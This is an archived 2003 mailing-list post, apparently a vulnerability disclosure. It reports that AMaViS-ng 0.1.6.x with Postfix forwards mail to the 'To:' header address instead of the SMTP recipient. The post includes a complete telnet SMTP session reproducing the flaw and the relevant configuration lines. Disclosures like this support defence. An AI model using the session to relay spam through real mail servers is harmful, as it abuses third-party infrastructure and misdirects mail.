Hi everyone - with postfix using AMaViS-ng 0.1.6.x (tested: 0.1.6.2 and 0.1.6.3; 0.1.4.x is not vulnerable), all email gets forwarded to the address specified by the "To:" header line, ignoring the real recipient given via "RCPT TO:". Possible exploit: --%snip%-- #> telnet somemx.domain.tld 25 (220 somemx.domain.tld ESMTP Postfix) helo amavis-ng (250 somemx.domain.tld) mail from:userXat_private (250 ok) rcpt to:userYat_private (250 ok) data (354 End data with <CR><LF>.<CR><LF>) From: userXat_private To: userZat_private Subject: AMaViS-ng 0.1.6.x bug . (250 Ok: queued as ...) quit (221 Bye) --%snip%-- Requirements: The mx (somemx.domain.tld) having postfix and AMaViS-ng 0.1.6.x installed must accept emails for userYat_private What does it to: userXat_private is sending an email to userYat_private The header of this email contains "To: userZat_private". AMaViS-ng seems to parse the header and forwards the email to userZat_private userYat_private does not get this email. As many postfix users trust their localhost (no restrictions for localhost), it is possible to relay an email or a spam mail this way. configuration files (relevant parts): # $postfix/master.cf smtp inet n - n - - smtpd -o content_filter=filter: filter unix - n n - - pipe flags=Rq user=mail argv=/usr/bin/amavis ${sender} -- ${recipient} # end of master.cf # $amavis-ng/amavis.conf [global] mail-transfer-agent = Postfix [Postfix] postfix = /usr/sbin/sendmail args = -i -f # end of amavis.conf There is no problem with AMaViS == 0.1.4.x Kind regards, Phil Cyc
This archive was generated by hypermail 2b30 : Tue Apr 08 2003 - 09:38:52 PDT